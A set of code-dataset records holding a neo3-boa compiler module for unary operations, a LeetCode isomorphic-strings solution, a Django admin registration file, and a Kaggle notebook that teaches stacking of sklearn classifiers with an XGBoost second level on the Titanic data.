0c1509e1816728cd8c2678be1b3f957b1ad9cc38 | 75e951dcf749f62f2a292774968fe95fc4a353c8 | /boa3/model/operation/unaryop.py | 8d001b89427dfa1ef705bb7c35ec6be1e5ab8fb7 | [
"Apache-2.0"
]
| permissive | jplippi/neo3-boa | e0a199d1ed2fa39abe09ebd3c013c360ca87f544 | 052be4adebb665113715bb80067d954f7ad85ad5 | refs/heads/development | 2022-08-19T10:17:43.610854 | 2020-05-25T20:30:42 | 2020-05-25T20:30:42 | 265,959,419 | 0 | 0 | Apache-2.0 | 2020-05-25T20:39:59 | 2020-05-21T21:54:24 | Python | UTF-8 | Python | false | false | 2,046 | py | from typing import Optional
from boa3.model.operation.operator import Operator
from boa3.model.operation.unary.booleannot import BooleanNot
from boa3.model.operation.unary.negative import Negative
from boa3.model.operation.unary.positive import Positive
from boa3.model.operation.unary.unaryoperation import UnaryOperation
from boa3.model.type.type import IType
class UnaryOp:
# Arithmetic operations
Positive = Positive()
Negative = Negative()
# Logical operations
Not = BooleanNot()
@classmethod
def validate_type(cls, operator: Operator, operand: IType) -> Optional[UnaryOperation]:
"""
Gets a unary operation given the operator and the operand type.
:param operator: unary operator
:param operand: type of the operand
:return: The operation if exists. None otherwise;
:rtype: UnaryOperation or None
"""
for id, op in vars(cls).items():
if isinstance(op, UnaryOperation) and op.is_valid(operator, operand):
return op.build(operand)
@classmethod
def get_operation_by_operator(cls, operator: Operator) -> Optional[UnaryOperation]:
"""
Gets a unary operation given the operator.
:param operator: unary operator
:return: The operation if exists. If exists more than one operation with the same operator, returns the first
found. None otherwise.
:rtype: UnaryOperation or None
"""
for id, op in vars(cls).items():
if isinstance(op, UnaryOperation) and op.operator is operator:
return op
@classmethod
def get_operation(cls, operation: UnaryOperation) -> Optional[UnaryOperation]:
"""
Gets an unary operation given another operation.
:param operation: unary operation
:return: The operation if exists. None otherwise;
:rtype: UnaryOperation or None
"""
for id, op in vars(cls).items():
if type(operation) == type(op):
return op
| [
"[email protected]"
]
| |
030b4c362a080ed3fefaefec7c4a04c2570a0144 | 8f7b7a910520ba49a2e614da72f7b6297f617409 | /Problemset/isomorphic-strings/isomorphic-strings.py | bfd41976cf490a5bac150110e345392d060325ff | []
| no_license | fank-cd/python_leetcode | 69c4466e9e202e48502252439b4cc318712043a2 | 61f07d7c7e76a1eada21eb3e6a1a177af3d56948 | refs/heads/master | 2021-06-16T23:41:55.591095 | 2021-03-04T08:31:47 | 2021-03-04T08:31:47 | 173,226,640 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 511 | py |
# @Title: 同构字符串 (Isomorphic Strings)
# @Author: [email protected]
# @Date: 2020-12-28 16:12:46
# @Runtime: 48 ms
# @Memory: 17.1 MB
from collections import defaultdict
class Solution:
def isIsomorphic(self, s: str, t: str) -> bool:
d1,d2 = defaultdict(list), defaultdict(list)
for index,i in enumerate(s):
d1[i].append(index)
for index,i in enumerate(t):
d2[i].append(index)
# print(list(d1.values()),list(d2.values()))
return list(d1.values()) == list(d2.values())
| [
"[email protected]"
]
| |
1f30f5e4102fbbdca71b5f19949cadfb232dfb14 | a42d5b8e53660db5b33d4cb3e9350eb983639cd8 | /board/admin.py | d39fd3a5723f23155ad3e5430bbb5406e68ef879 | []
| no_license | Tedhoon/SPNU_DP | 03a0b3e6ae5fa0cf045617ef1da6c14f1084202b | 3776417fc5d3cb099d6f7029d6864d58b5e535b6 | refs/heads/master | 2022-11-29T15:20:31.594799 | 2019-10-17T17:18:04 | 2019-10-17T17:18:04 | 211,781,362 | 1 | 0 | null | 2022-11-22T04:16:33 | 2019-09-30T05:23:59 | CSS | UTF-8 | Python | false | false | 123 | py | from django.contrib import admin
from .models import *
admin.site.register(NoticeBoard)
admin.site.register(FreeBoard) | [
"[email protected]"
]
| |
ec1d53bcb53a59ed0b3cf5cdec093ad9456263da | a560269290749e10466b1a29584f06a2b8385a47 | /Notebooks/py/alberto33/introduction-to-ensembling-stacking-in-python/introduction-to-ensembling-stacking-in-python.py | 697cfa42405f34ec019f187864f73b14e61421cd | []
| no_license | nischalshrestha/automatic_wat_discovery | c71befad1aa358ae876d5494a67b0f4aa1266f23 | 982e700d8e4698a501afffd6c3a2f35346c34f95 | refs/heads/master | 2022-04-07T12:40:24.376871 | 2020-03-15T22:27:39 | 2020-03-15T22:27:39 | 208,379,586 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 29,957 | py | #!/usr/bin/env python
# coding: utf-8
# # Introduction
#
# This notebook is a basic introductory primer to the method of ensembling (combining) base learning models, in particular the variant of ensembling known as Stacking. In a nutshell, stacking uses the predictions of a few basic classifiers as a first level (base), and then trains another model at the second level to predict the target from those first-level predictions.
#
# The Titanic dataset is a prime candidate for introducing this concept, as many newcomers to Kaggle start out here. Furthermore, even though stacking has been responsible for many a team winning Kaggle competitions, there seems to be a dearth of kernels on this topic, so I hope this notebook can go some way towards filling that void.
#
# I myself am quite a newcomer to the Kaggle scene as well and the first proper ensembling/stacking script that I managed to chance upon and study was one written in the AllState Severity Claims competition by the great Faron. The material in this notebook borrows heavily from Faron's script although ported to factor in ensembles of classifiers whilst his was ensembles of regressors. Anyway please check out his script here:
#
# [Stacking Starter][1] : by Faron
#
#
# Now onto the notebook at hand and I hope that it manages to do justice and convey the concept of ensembling in an intuitive and concise manner. My other standalone Kaggle [script][2] which implements exactly the same ensembling steps (albeit with different parameters) discussed below gives a Public LB score of 0.808 which is good enough to get to the top 9% and runs just under 4 minutes. Therefore I am pretty sure there is a lot of room to improve and add on to that script. Anyways please feel free to leave me any comments with regards to how I can improve
#
#
# [1]: https://www.kaggle.com/mmueller/allstate-claims-severity/stacking-starter/run/390867
# [2]: https://www.kaggle.com/arthurtok/titanic/simple-stacking-with-xgboost-0-808
# In[ ]:
# Load in our libraries
import pandas as pd
import numpy as np
import re
import sklearn
import xgboost as xgb
import seaborn as sns
import matplotlib.pyplot as plt
get_ipython().magic(u'matplotlib inline')
import plotly.offline as py
py.init_notebook_mode(connected=True)
import plotly.graph_objs as go
import plotly.tools as tls
import warnings
warnings.filterwarnings('ignore')
# Going to use these 5 base models for the stacking
from sklearn.ensemble import (RandomForestClassifier, AdaBoostClassifier,
GradientBoostingClassifier, ExtraTreesClassifier)
from sklearn.svm import SVC
from sklearn.cross_validation import KFold
# # Feature Exploration, Engineering and Cleaning
#
# Now we will proceed much like how most kernels in general are structured, and that is to first explore the data on hand, identify possible feature engineering opportunities as well as numerically encode any categorical features.
# In[ ]:
# Load in the train and test datasets
train = pd.read_csv('../input/train.csv')
test = pd.read_csv('../input/test.csv')
# Store our passenger ID for easy access
PassengerId = test['PassengerId']
train.head(3)
# Well it is no surprise that our task is to somehow extract the information out of the categorical variables
#
# **Feature Engineering**
#
# Here, credit must be extended to Sina's very comprehensive and well-thought out notebook for the feature engineering ideas so please check out his work
#
# [Titanic Best Working Classfier][1] : by Sina
#
#
# [1]: https://www.kaggle.com/sinakhorami/titanic/titanic-best-working-classifier
# In[ ]:
full_data = [train, test]
# Some features of my own that I have added in
# Gives the length of the name
train['Name_length'] = train['Name'].apply(len)
test['Name_length'] = test['Name'].apply(len)
# Feature that tells whether a passenger had a cabin on the Titanic
train['Has_Cabin'] = train["Cabin"].apply(lambda x: 0 if type(x) == float else 1)
test['Has_Cabin'] = test["Cabin"].apply(lambda x: 0 if type(x) == float else 1)
# Feature engineering steps taken from Sina
# Create new feature FamilySize as a combination of SibSp and Parch
for dataset in full_data:
dataset['FamilySize'] = dataset['SibSp'] + dataset['Parch'] + 1
# Create new feature IsAlone from FamilySize
for dataset in full_data:
dataset['IsAlone'] = 0
dataset.loc[dataset['FamilySize'] == 1, 'IsAlone'] = 1
# Remove all NULLS in the Embarked column
for dataset in full_data:
dataset['Embarked'] = dataset['Embarked'].fillna('S')
# Remove all NULLS in the Fare column and create a new feature CategoricalFare
for dataset in full_data:
dataset['Fare'] = dataset['Fare'].fillna(train['Fare'].median())
train['CategoricalFare'] = pd.qcut(train['Fare'], 4)
# Create a New feature CategoricalAge
for dataset in full_data:
age_avg = dataset['Age'].mean()
age_std = dataset['Age'].std()
age_null_count = dataset['Age'].isnull().sum()
age_null_random_list = np.random.randint(age_avg - age_std, age_avg + age_std, size=age_null_count)
dataset['Age'][np.isnan(dataset['Age'])] = age_null_random_list
dataset['Age'] = dataset['Age'].astype(int)
train['CategoricalAge'] = pd.cut(train['Age'], 5)
# Define function to extract titles from passenger names
def get_title(name):
title_search = re.search(' ([A-Za-z]+)\.', name)
# If the title exists, extract and return it.
if title_search:
return title_search.group(1)
return ""
# Create a new feature Title, containing the titles of passenger names
for dataset in full_data:
dataset['Title'] = dataset['Name'].apply(get_title)
# Group all non-common titles into one single grouping "Rare"
for dataset in full_data:
dataset['Title'] = dataset['Title'].replace(['Lady', 'Countess','Capt', 'Col','Don', 'Dr', 'Major', 'Rev', 'Sir', 'Jonkheer', 'Dona'], 'Rare')
dataset['Title'] = dataset['Title'].replace('Mlle', 'Miss')
dataset['Title'] = dataset['Title'].replace('Ms', 'Miss')
dataset['Title'] = dataset['Title'].replace('Mme', 'Mrs')
for dataset in full_data:
# Mapping Sex
dataset['Sex'] = dataset['Sex'].map( {'female': 0, 'male': 1} ).astype(int)
# Mapping titles
title_mapping = {"Mr": 1, "Miss": 2, "Mrs": 3, "Master": 4, "Rare": 5}
dataset['Title'] = dataset['Title'].map(title_mapping)
dataset['Title'] = dataset['Title'].fillna(0)
# Mapping Embarked
dataset['Embarked'] = dataset['Embarked'].map( {'S': 0, 'C': 1, 'Q': 2} ).astype(int)
# Mapping Fare
dataset.loc[ dataset['Fare'] <= 7.91, 'Fare'] = 0
dataset.loc[(dataset['Fare'] > 7.91) & (dataset['Fare'] <= 14.454), 'Fare'] = 1
dataset.loc[(dataset['Fare'] > 14.454) & (dataset['Fare'] <= 31), 'Fare'] = 2
dataset.loc[ dataset['Fare'] > 31, 'Fare'] = 3
dataset['Fare'] = dataset['Fare'].astype(int)
# Mapping Age
dataset.loc[ dataset['Age'] <= 16, 'Age'] = 0
dataset.loc[(dataset['Age'] > 16) & (dataset['Age'] <= 32), 'Age'] = 1
dataset.loc[(dataset['Age'] > 32) & (dataset['Age'] <= 48), 'Age'] = 2
dataset.loc[(dataset['Age'] > 48) & (dataset['Age'] <= 64), 'Age'] = 3
dataset.loc[ dataset['Age'] > 64, 'Age'] = 4 ;
# In[ ]:
# Feature selection
drop_elements = ['PassengerId', 'Name', 'Ticket', 'Cabin', 'SibSp']
train = train.drop(drop_elements, axis = 1)
train = train.drop(['CategoricalAge', 'CategoricalFare'], axis = 1)
test = test.drop(drop_elements, axis = 1)
# All right, having cleaned the features, extracted the relevant information and dropped the categorical columns, our features should now all be numeric, a format suitable to feed into our Machine Learning models. However, before we proceed, let us generate some simple correlation and distribution plots of our transformed dataset to observe how one feature relates to the next.
#
# ## Visualisations
# In[ ]:
train.head(3)
# **Pearson Correlation Heatmap**
#
# let us generate some correlation plots of the features to see how related one feature is to the next. To do so, we will utilise the Seaborn plotting package which allows us to plot heatmaps very conveniently as follows
# In[ ]:
colormap = plt.cm.RdBu
plt.figure(figsize=(15,15))
plt.title('Pearson Correlation of Features 2', y=1.05, size=15)
sns.heatmap(train.astype(float).corr(),linewidths=0.1,vmax=1.0,
square=False, cmap=colormap, linecolor='black', annot=True)
# **Takeaway from the Plots**
#
# One thing that the Pearson Correlation plot can tell us is that there are not too many features strongly correlated with one another. This is good from the point of view of feeding these features into your learning model, because it means there isn't much redundant or superfluous data in our training set and each feature carries some unique information. The two most correlated features here are Family size and Parch (Parents and Children). I'll still leave both features in for the purposes of this exercise.
#
# **Pairplots**
#
# Finally let us generate some pairplots to observe the distribution of data from one feature to the other. Once again we use Seaborn to help us.
# In[ ]:
g = sns.pairplot(train[[u'Survived', u'Pclass', u'Sex', u'Age', u'Parch', u'Fare', u'Embarked',
u'FamilySize', u'IsAlone', u'Title']], hue='Survived', palette = 'seismic',size=1.2,diag_kind = 'kde',diag_kws=dict(shade=True),plot_kws=dict(s=10) )
g.set(xticklabels=[])
# # Ensembling & Stacking models
#
# Finally after that brief whirlwind detour with regards to feature engineering and formatting, we finally arrive at the meat and gist of the this notebook.
#
# Creating a Stacking ensemble!
# ### Helpers via Python Classes
#
# Here we invoke the use of Python's classes to help make it more convenient for us. For any newcomers to programming, one normally hears Classes being used in conjunction with Object-Oriented Programming (OOP). In short, a class helps to extend some code/program for creating objects (variables for old-school peeps) as well as to implement functions and methods specific to that class.
#
# In the section of code below, we essentially write a class *SklearnHelper* that allows one to extend the inbuilt methods (such as train, predict and fit) common to all the Sklearn classifiers. Therefore this cuts out redundancy, as we won't need to write the same methods five times if we want to invoke five different classifiers.
# In[ ]:
# Some useful parameters which will come in handy later on
ntrain = train.shape[0]
ntest = test.shape[0]
SEED = 0 # for reproducibility
NFOLDS = 5 # set folds for out-of-fold prediction
kf = KFold(ntrain, n_folds= NFOLDS, random_state=SEED)
# Class to extend the Sklearn classifier
class SklearnHelper(object):
def __init__(self, clf, seed=0, params=None):
params['random_state'] = seed
self.clf = clf(**params)
def train(self, x_train, y_train):
self.clf.fit(x_train, y_train)
def predict(self, x):
return self.clf.predict(x)
def fit(self,x,y):
return self.clf.fit(x,y)
def feature_importances(self,x,y):
print(self.clf.fit(x,y).feature_importances_)
# Class to extend XGboost classifer
# Bear with me for those who already know this but for people who have not created classes or objects in Python before, let me explain what the code given above does. In creating my base classifiers, I will only use the models already present in the Sklearn library and therefore only extend the class for that.
#
# **def init** : Python standard for invoking the default constructor for the class. This means that when you want to create an object (classifier), you have to give it the parameters of clf (what sklearn classifier you want), seed (random seed) and params (parameters for the classifiers).
#
# The rest of the code are simply methods of the class which simply call the corresponding methods already existing within the sklearn classifiers. Essentially, we have created a wrapper class to extend the various Sklearn classifiers so that this should help us reduce having to write the same code over and over when we implement multiple learners to our stacker.
# ### Out-of-Fold Predictions
#
# Now, as alluded to in the introductory section, stacking uses the predictions of the base classifiers as input for training a second-level model. However, one cannot simply train the base models on the full training data, generate predictions on that same training data and then feed these into the second-level training. That would let each base model predict on rows it had already seen during fitting, so the first-level predictions would leak the target and the second-level model would overfit. The out-of-fold scheme below instead predicts every training row with a model fitted only on the remaining folds.
# In[ ]:
def get_oof(clf, x_train, y_train, x_test):
oof_train = np.zeros((ntrain,))
oof_test = np.zeros((ntest,))
oof_test_skf = np.empty((NFOLDS, ntest))
for i, (train_index, test_index) in enumerate(kf):
x_tr = x_train[train_index]
y_tr = y_train[train_index]
x_te = x_train[test_index]
clf.train(x_tr, y_tr)
oof_train[test_index] = clf.predict(x_te)
oof_test_skf[i, :] = clf.predict(x_test)
oof_test[:] = oof_test_skf.mean(axis=0)
return oof_train.reshape(-1, 1), oof_test.reshape(-1, 1)
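# For each first-level model, get_oof hands back an (ntrain, 1) column of out-of-fold
# predictions (every training row is predicted by a model fitted on the other folds) and an
# (ntest, 1) column of test-set predictions averaged over the NFOLDS fold models.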
# # Generating our Base First-Level Models
#
# So now let us prepare five learning models as our first level classification. These models can all be conveniently invoked via the Sklearn library and are listed as follows:
#
# 1. Random Forest classifier
# 2. Extra Trees classifier
# 3. AdaBoost classifer
# 4. Gradient Boosting classifer
# 5. Support Vector Machine
# **Parameters**
#
# Just a quick summary of the parameters that we will be listing here for completeness,
#
# **n_jobs** : Number of cores used for the training process. If set to -1, all cores are used.
#
# **n_estimators** : Number of classification trees in your learning model (set to 10 by default).
#
# **max_depth** : Maximum depth of the tree, i.e. how far nodes may be expanded. Beware that too high a value runs the risk of overfitting, as the tree would grow too deep.
#
# **verbose** : Controls whether you want to output any text during the learning process. A value of 0 suppresses all text while a value of 3 outputs the tree learning process at every iteration.
#
# Please check out the full description via the official Sklearn website. There you will find that there are a whole host of other useful parameters that you can play around with.
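# For instance, a quick way to list every available parameter name of a classifier is sklearn's get_params()
# (this assumes RandomForestClassifier has already been imported in the earlier cells of this notebook, as it
# is used directly further down):
print(sorted(RandomForestClassifier().get_params().keys()))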
# In[ ]:
# Put in our parameters for said classifiers
# Random Forest parameters
rf_params = {
'n_jobs': -1,
'n_estimators': 500,
'warm_start': True,
#'max_features': 0.2,
'max_depth': 6,
'min_samples_leaf': 2,
'max_features' : 'sqrt',
'verbose': 0
}
# Extra Trees Parameters
et_params = {
'n_jobs': -1,
'n_estimators':500,
#'max_features': 0.5,
'max_depth': 8,
'min_samples_leaf': 2,
'verbose': 0
}
# AdaBoost parameters
ada_params = {
'n_estimators': 500,
'learning_rate' : 0.75
}
# Gradient Boosting parameters
gb_params = {
'n_estimators': 500,
#'max_features': 0.2,
'max_depth': 5,
'min_samples_leaf': 2,
'verbose': 0
}
# Support Vector Classifier parameters
svc_params = {
'kernel' : 'linear',
'C' : 0.025
}
# Furthermore, having talked about objects and classes within the OOP framework, let us now create 5 objects that represent our 5 learning models via the Helper Sklearn class we defined earlier.
# In[ ]:
# Create 5 objects that represent our 5 models
rf = SklearnHelper(clf=RandomForestClassifier, seed=SEED, params=rf_params)
et = SklearnHelper(clf=ExtraTreesClassifier, seed=SEED, params=et_params)
ada = SklearnHelper(clf=AdaBoostClassifier, seed=SEED, params=ada_params)
gb = SklearnHelper(clf=GradientBoostingClassifier, seed=SEED, params=gb_params)
svc = SklearnHelper(clf=SVC, seed=SEED, params=svc_params)
# **Creating NumPy arrays out of our train and test sets**
#
# Great. Having prepared our first-layer base models, we can now ready the training and test data for input into our classifiers by generating NumPy arrays out of their original dataframes as follows:
# In[ ]:
# Create Numpy arrays of train, test and target ( Survived) dataframes to feed into our models
y_train = train['Survived'].ravel()
train = train.drop(['Survived'], axis=1)
x_train = train.values # Creates an array of the train data
x_test = test.values # Creates an array of the test data
# **Output of the First level Predictions**
#
# We now feed the training and test data into our 5 base classifiers and use the Out-of-Fold prediction function we defined earlier to generate our first level predictions. Allow a handful of minutes for the chunk of code below to run.
# In[ ]:
# Create our OOF train and test predictions. These base results will be used as new features
et_oof_train, et_oof_test = get_oof(et, x_train, y_train, x_test) # Extra Trees
rf_oof_train, rf_oof_test = get_oof(rf,x_train, y_train, x_test) # Random Forest
ada_oof_train, ada_oof_test = get_oof(ada, x_train, y_train, x_test) # AdaBoost
gb_oof_train, gb_oof_test = get_oof(gb,x_train, y_train, x_test) # Gradient Boost
svc_oof_train, svc_oof_test = get_oof(svc,x_train, y_train, x_test) # Support Vector Classifier
print("Training is complete")
# **Feature importances generated from the different classifiers**
#
# Now, having trained our first-level classifiers, we can utilise a nifty feature of the Sklearn models: outputting the importances of the various features in the training data with one very simple line of code.
#
# As per the Sklearn documentation, most of the tree-based classifiers come with an attribute that returns the feature importances: simply access **.feature_importances_**. We will invoke this very useful attribute via the helper function defined earlier and plot the feature importances for the four tree-based models (SVC does not expose this attribute), as follows:
# In[ ]:
rf_feature = rf.feature_importances(x_train,y_train)
et_feature = et.feature_importances(x_train, y_train)
ada_feature = ada.feature_importances(x_train, y_train)
gb_feature = gb.feature_importances(x_train,y_train)
# So I have not yet figured out how to assign and store the feature importances outright. Therefore I'll print out the values from the code above and then simply copy and paste into Python lists as below (sorry for the lousy hack)
# In[ ]:
rf_features = [0.10474135, 0.21837029, 0.04432652, 0.02249159, 0.05432591, 0.02854371
,0.07570305, 0.01088129 , 0.24247496, 0.13685733 , 0.06128402]
et_features = [ 0.12165657, 0.37098307 ,0.03129623 , 0.01591611 , 0.05525811 , 0.028157
,0.04589793 , 0.02030357 , 0.17289562 , 0.04853517, 0.08910063]
ada_features = [0.028 , 0.008 , 0.012 , 0.05866667, 0.032 , 0.008
,0.04666667 , 0. , 0.05733333, 0.73866667, 0.01066667]
gb_features = [ 0.06796144 , 0.03889349 , 0.07237845 , 0.02628645 , 0.11194395, 0.04778854
,0.05965792 , 0.02774745, 0.07462718, 0.4593142 , 0.01340093]
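# A small tweak could avoid the manual copy-and-paste above: the feature_importances method of SklearnHelper prints
# the array instead of returning it, but the fitted attribute can be read directly. The helper below is only a sketch
# of that idea; the calls are left commented out because re-running them would refit the models:
def get_feature_importances(helper, x, y):
    # Fit the wrapped sklearn classifier and return its importances array instead of printing it
    return helper.clf.fit(x, y).feature_importances_
# rf_features = get_feature_importances(rf, x_train, y_train).tolist()
# et_features = get_feature_importances(et, x_train, y_train).tolist()
# ada_features = get_feature_importances(ada, x_train, y_train).tolist()
# gb_features = get_feature_importances(gb, x_train, y_train).tolist()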
# Create a dataframe from the lists containing the feature importance data for easy plotting via the Plotly package.
# In[ ]:
cols = train.columns.values
# Create a dataframe with features
feature_dataframe = pd.DataFrame( {'features': cols,
'Random Forest feature importances': rf_features,
'Extra Trees feature importances': et_features,
'AdaBoost feature importances': ada_features,
'Gradient Boost feature importances': gb_features
})
# **Interactive feature importances via Plotly scatterplots**
#
# I'll use the interactive Plotly package at this juncture to visualise the feature importance values of the different classifiers via a Plotly scatter plot, created by calling "Scatter" as follows:
# In[ ]:
# Scatter plot
trace = go.Scatter(
y = feature_dataframe['Random Forest feature importances'].values,
x = feature_dataframe['features'].values,
mode='markers',
marker=dict(
sizemode = 'diameter',
sizeref = 1,
size = 25,
# size= feature_dataframe['AdaBoost feature importances'].values,
#color = np.random.randn(500), #set color equal to a variable
color = feature_dataframe['Random Forest feature importances'].values,
colorscale='Portland',
showscale=True
),
text = feature_dataframe['features'].values
)
data = [trace]
layout= go.Layout(
autosize= True,
title= 'Random Forest Feature Importance',
hovermode= 'closest',
# xaxis= dict(
# title= 'Pop',
# ticklen= 5,
# zeroline= False,
# gridwidth= 2,
# ),
yaxis=dict(
title= 'Feature Importance',
ticklen= 5,
gridwidth= 2
),
showlegend= False
)
fig = go.Figure(data=data, layout=layout)
py.iplot(fig,filename='scatter2010')
# Scatter plot
trace = go.Scatter(
y = feature_dataframe['Extra Trees feature importances'].values,
x = feature_dataframe['features'].values,
mode='markers',
marker=dict(
sizemode = 'diameter',
sizeref = 1,
size = 25,
# size= feature_dataframe['AdaBoost feature importances'].values,
#color = np.random.randn(500), #set color equal to a variable
color = feature_dataframe['Extra Trees feature importances'].values,
colorscale='Portland',
showscale=True
),
text = feature_dataframe['features'].values
)
data = [trace]
layout= go.Layout(
autosize= True,
title= 'Extra Trees Feature Importance',
hovermode= 'closest',
# xaxis= dict(
# title= 'Pop',
# ticklen= 5,
# zeroline= False,
# gridwidth= 2,
# ),
yaxis=dict(
title= 'Feature Importance',
ticklen= 5,
gridwidth= 2
),
showlegend= False
)
fig = go.Figure(data=data, layout=layout)
py.iplot(fig,filename='scatter2010')
# Scatter plot
trace = go.Scatter(
y = feature_dataframe['AdaBoost feature importances'].values,
x = feature_dataframe['features'].values,
mode='markers',
marker=dict(
sizemode = 'diameter',
sizeref = 1,
size = 25,
# size= feature_dataframe['AdaBoost feature importances'].values,
#color = np.random.randn(500), #set color equal to a variable
color = feature_dataframe['AdaBoost feature importances'].values,
colorscale='Portland',
showscale=True
),
text = feature_dataframe['features'].values
)
data = [trace]
layout= go.Layout(
autosize= True,
title= 'AdaBoost Feature Importance',
hovermode= 'closest',
# xaxis= dict(
# title= 'Pop',
# ticklen= 5,
# zeroline= False,
# gridwidth= 2,
# ),
yaxis=dict(
title= 'Feature Importance',
ticklen= 5,
gridwidth= 2
),
showlegend= False
)
fig = go.Figure(data=data, layout=layout)
py.iplot(fig,filename='scatter2010')
# Scatter plot
trace = go.Scatter(
y = feature_dataframe['Gradient Boost feature importances'].values,
x = feature_dataframe['features'].values,
mode='markers',
marker=dict(
sizemode = 'diameter',
sizeref = 1,
size = 25,
# size= feature_dataframe['AdaBoost feature importances'].values,
#color = np.random.randn(500), #set color equal to a variable
color = feature_dataframe['Gradient Boost feature importances'].values,
colorscale='Portland',
showscale=True
),
text = feature_dataframe['features'].values
)
data = [trace]
layout= go.Layout(
autosize= True,
title= 'Gradient Boosting Feature Importance',
hovermode= 'closest',
# xaxis= dict(
# title= 'Pop',
# ticklen= 5,
# zeroline= False,
# gridwidth= 2,
# ),
yaxis=dict(
title= 'Feature Importance',
ticklen= 5,
gridwidth= 2
),
showlegend= False
)
fig = go.Figure(data=data, layout=layout)
py.iplot(fig,filename='scatter2010')
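# The four scatter-plot cells above are identical apart from the column being plotted. A small helper along these
# lines (reusing the feature_dataframe and the Plotly objects already imported as go/py) could produce any one of
# them and is easier to maintain; it is only a sketch of the refactoring idea:
def plot_feature_importance(column, title):
    # Build the same marker-coloured scatter of importance value vs. feature name
    trace = go.Scatter(
        y=feature_dataframe[column].values,
        x=feature_dataframe['features'].values,
        mode='markers',
        marker=dict(sizemode='diameter', sizeref=1, size=25,
                    color=feature_dataframe[column].values,
                    colorscale='Portland', showscale=True),
        text=feature_dataframe['features'].values)
    layout = go.Layout(autosize=True, title=title, hovermode='closest',
                       yaxis=dict(title='Feature Importance', ticklen=5, gridwidth=2),
                       showlegend=False)
    py.iplot(go.Figure(data=[trace], layout=layout), filename='scatter2010')
# e.g. plot_feature_importance('Random Forest feature importances',
#                              'Random Forest Feature Importance')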
# Now let us calculate the mean of all the feature importances and store it as a new column in the feature importance dataframe.
# In[ ]:
# Create the new column containing the average of values
feature_dataframe['mean'] = feature_dataframe.mean(axis= 1) # axis = 1 computes the mean row-wise
feature_dataframe.head(3)
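# Side note: on newer pandas versions, calling .mean(axis=1) on a frame that mixes the string 'features' column
# with numeric columns may warn or raise; if that happens, restricting the mean to numeric columns is the usual fix:
# feature_dataframe['mean'] = feature_dataframe.mean(axis=1, numeric_only=True)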
# **Plotly Barplot of Average Feature Importances**
#
# Having obtained the mean feature importance across all our classifiers, we can plot them into a Plotly bar plot as follows:
# In[ ]:
y = feature_dataframe['mean'].values
x = feature_dataframe['features'].values
data = [go.Bar(
x= x,
y= y,
width = 0.5,
marker=dict(
color = feature_dataframe['mean'].values,
colorscale='Portland',
showscale=True,
reversescale = False
),
opacity=0.6
)]
layout= go.Layout(
autosize= True,
title= 'Barplots of Mean Feature Importance',
hovermode= 'closest',
# xaxis= dict(
# title= 'Pop',
# ticklen= 5,
# zeroline= False,
# gridwidth= 2,
# ),
yaxis=dict(
title= 'Feature Importance',
ticklen= 5,
gridwidth= 2
),
showlegend= False
)
fig = go.Figure(data=data, layout=layout)
py.iplot(fig, filename='bar-direct-labels')
# # Second-Level Predictions from the First-level Output
# **First-level output as new features**
#
# Having now obtained our first-level predictions, one can think of them as essentially a new set of features to be used as training data for the next classifier. As per the code below, the new columns are the first-level predictions from our earlier classifiers, and we train the next classifier on them.
# In[ ]:
base_predictions_train = pd.DataFrame( {'RandomForest': rf_oof_train.ravel(),
'ExtraTrees': et_oof_train.ravel(),
'AdaBoost': ada_oof_train.ravel(),
'GradientBoost': gb_oof_train.ravel()
})
base_predictions_train.head()
# **Correlation Heatmap of the Second Level Training set**
# In[ ]:
data = [
go.Heatmap(
z= base_predictions_train.astype(float).corr().values ,
x=base_predictions_train.columns.values,
y= base_predictions_train.columns.values,
colorscale='Viridis',
showscale=True,
reversescale = True
)
]
py.iplot(data, filename='labelled-heatmap')
# There have been quite a few articles and Kaggle competition winners' write-ups on the merits of training models whose predictions are relatively uncorrelated with one another, as this tends to produce better ensemble scores.
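# One simple way to put a number on that diversity is the average pairwise correlation between the base models'
# out-of-fold predictions (reusing the base_predictions_train frame built above); lower values generally suggest
# the models are contributing different information:
corr_values = base_predictions_train.astype(float).corr().values
avg_corr = corr_values[np.triu_indices_from(corr_values, k=1)].mean()
print("Average pairwise correlation between base models: %.3f" % avg_corr)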
# In[ ]:
x_train = np.concatenate(( et_oof_train, rf_oof_train, ada_oof_train, gb_oof_train, svc_oof_train), axis=1)
x_test = np.concatenate(( et_oof_test, rf_oof_test, ada_oof_test, gb_oof_test, svc_oof_test), axis=1)
# Having concatenated the first-level train and test predictions into x_train and x_test, we can now fit a second-level learning model.
# ### Second level learning model via XGBoost
#
# Here we choose the eXtremely famous boosted-tree library, XGBoost, which was built to optimise large-scale, distributed gradient-boosted tree algorithms. For further information about the algorithm, check out the [official documentation][1].
#
# [1]: https://xgboost.readthedocs.io/en/latest/
#
# Anyways, we call an XGBClassifier and fit it to the first-level train and target data and use the learned model to predict the test data as follows:
# In[ ]:
gbm = xgb.XGBClassifier(
#learning_rate = 0.02,
n_estimators= 2000,
max_depth= 4,
min_child_weight= 2,
#gamma=1,
gamma=0.9,
subsample=0.8,
colsample_bytree=0.8,
objective= 'binary:logistic',
nthread= -1,
scale_pos_weight=1).fit(x_train, y_train)
predictions = gbm.predict(x_test)
# Just a quick run down of the XGBoost parameters used in the model:
#
# **max_depth** : How deep you want to grow your tree. Beware that setting it too high runs the risk of overfitting.
#
# **gamma** : minimum loss reduction required to make a further partition on a leaf node of the tree. The larger, the more conservative the algorithm will be.
#
# **eta** : step-size shrinkage (exposed as learning_rate in the sklearn API) used in each boosting step to prevent overfitting; it is left at its default in the model above.
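# Before producing a submission it can be worth sanity-checking the stacker on the training data. A minimal sketch
# (left commented out because it is slow and assumes a scikit-learn recent enough to have model_selection) could be:
# from sklearn.model_selection import cross_val_score
# scores = cross_val_score(xgb.XGBClassifier(n_estimators=2000, max_depth=4, objective='binary:logistic'),
#                          x_train, y_train, cv=5, scoring='accuracy')
# print("Stacker CV accuracy: %.3f +/- %.3f" % (scores.mean(), scores.std()))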
# **Producing the Submission file**
#
# Finally having trained and fit all our first-level and second-level models, we can now output the predictions into the proper format for submission to the Titanic competition as follows:
# In[ ]:
# Generate Submission File
StackingSubmission = pd.DataFrame({ 'PassengerId': PassengerId,
'Survived': predictions })
StackingSubmission.to_csv("StackingSubmission.csv", index=False)
# **Steps for Further Improvement**
#
# As a closing remark, note that the steps above show only a very simple way of producing an ensemble stacker. Ensembles created at the highest level of Kaggle competitions involve monstrous combinations of stacked classifiers, with stacking that goes beyond two levels.
#
# Some additional steps that may be taken to improve one's score could be:
#
